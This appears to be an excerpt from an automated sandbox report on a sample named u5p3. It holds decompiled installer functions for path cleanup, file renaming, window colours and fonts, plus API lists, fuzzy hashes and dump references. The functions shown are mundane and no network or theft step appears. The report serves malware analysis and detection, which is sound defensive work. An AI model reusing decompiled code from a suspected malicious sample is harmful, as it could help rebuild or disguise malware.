                                                          • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                        • GetShortPathNameW.KERNEL32 ref: 00405EF9
                                                        • wsprintfA.USER32 ref: 00405F17
                                                        • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                                        • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                                        • GlobalFree.KERNEL32 ref: 00406000
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406007
                                                          • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                          • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                        • String ID: %ls=%ls$[Rename]
                                                        • API String ID: 2171350718-461813615
                                                        • Opcode ID: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                                        • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
                                                        • Opcode Fuzzy Hash: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                                        • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004064E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E004064E0(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405B94(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405B4A(L"*?|<>/\":", _t5))) == 0) {
							E00405CF9(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                        0x004064e2
                                                        0x004064eb
                                                        0x00406502
                                                        0x00406502
                                                        0x00406509
                                                        0x00406515
                                                        0x00406515
                                                        0x00406518
                                                        0x0040651b
                                                        0x00406520
                                                        0x00406522
                                                        0x0040652b
                                                        0x0040652f
                                                        0x0040654c
                                                        0x00406554
                                                        0x00406554
                                                        0x00406559
                                                        0x0040655b
                                                        0x0040655e
                                                        0x00406563
                                                        0x00406564
                                                        0x00406568
                                                        0x00406568
                                                        0x00406569
                                                        0x00406570
                                                        0x00406572
                                                        0x00406579
                                                        0x00000000
                                                        0x00000000
                                                        0x00406581
                                                        0x00406587
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406587
                                                        0x0040658c

                                                        APIs
                                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\u5p3.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,7476FAA0,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                                        • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                                        • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\u5p3.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,7476FAA0,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                                        • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\u5p3.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,7476FAA0,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\Public\u5p3.bat" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-2452240112
                                                        • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                        • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
                                                        • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                        • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404248 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00404248(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                        0x0040425a
                                                        0x004042ee
                                                        0x00000000
                                                        0x004042ee
                                                        0x0040426b
                                                        0x0040426f
                                                        0x00000000
                                                        0x00000000
                                                        0x00404275
                                                        0x0040427e
                                                        0x00404281
                                                        0x00404281
                                                        0x00404287
                                                        0x0040428d
                                                        0x0040428d
                                                        0x00404299
                                                        0x0040429f
                                                        0x004042a6
                                                        0x004042a9
                                                        0x004042ac
                                                        0x004042ae
                                                        0x004042ae
                                                        0x004042b6
                                                        0x004042bc
                                                        0x004042bc
                                                        0x004042c6
                                                        0x004042cb
                                                        0x004042ce
                                                        0x004042d3
                                                        0x004042d6
                                                        0x004042d6
                                                        0x004042e6
                                                        0x004042e6
                                                        0x00000000

                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                                        • GetSysColor.USER32(00000000), ref: 00404281
                                                        • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                                        • SetBkMode.GDI32(?,?), ref: 00404299
                                                        • GetSysColor.USER32(?), ref: 004042AC
                                                        • SetBkColor.GDI32(?,?), ref: 004042BC
                                                        • DeleteObject.GDI32(?), ref: 004042D6
                                                        • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                        • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                                        • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                        • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 100022D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 85%
                                                        			E100022D0(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed int* _t42;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t41;
							goto L12;
						} else {
							_t37 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E10001243();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t42 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t38 =  *_t51;
						_t51[7] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E1000122C(0x10004044);
					goto L10;
				}
			}











                                                        0x100022e4
                                                        0x100022e8
                                                        0x100022f3
                                                        0x100022f3
                                                        0x100022fa
                                                        0x100022ff
                                                        0x00000000
                                                        0x00000000
                                                        0x10002303
                                                        0x10002306
                                                        0x00000000
                                                        0x00000000
                                                        0x1000230b
                                                        0x10002316
                                                        0x10002326
                                                        0x00000000
                                                        0x1000231d
                                                        0x1000231f
                                                        0x10002335
                                                        0x00000000
                                                        0x10002335
                                                        0x1000230d
                                                        0x1000230d
                                                        0x10002336
                                                        0x10002336
                                                        0x10002338
                                                        0x1000233c
                                                        0x1000233c
                                                        0x1000233f
                                                        0x1000233f
                                                        0x10002347
                                                        0x1000234e
                                                        0x10002351
                                                        0x10002410
                                                        0x10002411
                                                        0x1000241c
                                                        0x10002446
                                                        0x10002446
                                                        0x1000242c
                                                        0x10002438
                                                        0x1000242e
                                                        0x1000242e
                                                        0x1000242e
                                                        0x00000000
                                                        0x10002357
                                                        0x10002357
                                                        0x00000000
                                                        0x1000235e
                                                        0x00000000
                                                        0x00000000
                                                        0x10002366
                                                        0x00000000
                                                        0x00000000
                                                        0x10002374
                                                        0x10002376
                                                        0x00000000
                                                        0x00000000
                                                        0x10002397
                                                        0x1000239d
                                                        0x100023a0
                                                        0x100023a2
                                                        0x100023b2
                                                        0x00000000
                                                        0x00000000
                                                        0x1000237f
                                                        0x10002384
                                                        0x10002387
                                                        0x10002388
                                                        0x00000000
                                                        0x00000000
                                                        0x100023be
                                                        0x100023c4
                                                        0x100023c5
                                                        0x100023c8
                                                        0x100023c9
                                                        0x100023cb
                                                        0x00000000
                                                        0x00000000
                                                        0x100023d7
                                                        0x100023da
                                                        0x100023e6
                                                        0x100023e8
                                                        0x00000000
                                                        0x00000000
                                                        0x100023f4
                                                        0x10002400
                                                        0x10002403
                                                        0x10002405
                                                        0x10002408
                                                        0x00000000
                                                        0x00000000
                                                        0x10002357
                                                        0x10002351
                                                        0x1000232b
                                                        0x10002330
                                                        0x00000000
                                                        0x10002330

                                                        APIs
                                                        • GlobalFree.KERNEL32 ref: 10002411
                                                          • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                        • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.841534468.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.841525683.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841545533.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841553679.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                        • String ID: @hqt
                                                        • API String ID: 4216380887-2648236075
                                                        • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                        • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                        • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                        • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404B7A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00404B7A(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                        0x00404b88
                                                        0x00404b95
                                                        0x00404b9b
                                                        0x00404bd9
                                                        0x00404bd9
                                                        0x00404be8
                                                        0x00404bef
                                                        0x00000000
                                                        0x00404bf1
                                                        0x00404b9d
                                                        0x00404bac
                                                        0x00404bb4
                                                        0x00404bb7
                                                        0x00404bc9
                                                        0x00404bcf
                                                        0x00404bd6
                                                        0x00000000
                                                        0x00404bd6
                                                        0x00000000

                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
                                                        • GetMessagePos.USER32 ref: 00404B9D
                                                        • ScreenToClient.USER32 ref: 00404BB7
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                        • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
                                                        • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                        • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 73%
                                                        			E00401DB3(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C15(2);
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				0x40cdb0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40cdc0 = E00402C15(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				 *0x40cdc7 = 1;
				 *0x40cdc4 = _t15 & 0x00000001;
				 *0x40cdc5 = _t15 & 0x00000002;
				 *0x40cdc6 = _t15 & 0x00000004;
				E0040626E(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x40cdb0);
				_push(_t18);
				_push(_t33);
				E00406193();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                        0x00401db3
                                                        0x00401dbe
                                                        0x00401dc0
                                                        0x00401dcd
                                                        0x00401de4
                                                        0x00401de9
                                                        0x00401df6
                                                        0x00401dfb
                                                        0x00401dff
                                                        0x00401e0a
                                                        0x00401e11
                                                        0x00401e23
                                                        0x00401e29
                                                        0x00401e2e
                                                        0x00401e38
                                                        0x0040258c
                                                        0x0040156d
                                                        0x00402a65
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401DB6
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                        • ReleaseDC.USER32 ref: 00401DE9
                                                        • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID: Calibri
                                                        • API String ID: 3808545654-1409258342
                                                        • Opcode ID: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                                        • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
                                                        • Opcode Fuzzy Hash: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                                        • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 100015FF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41memorylibraryloaderCOMMON
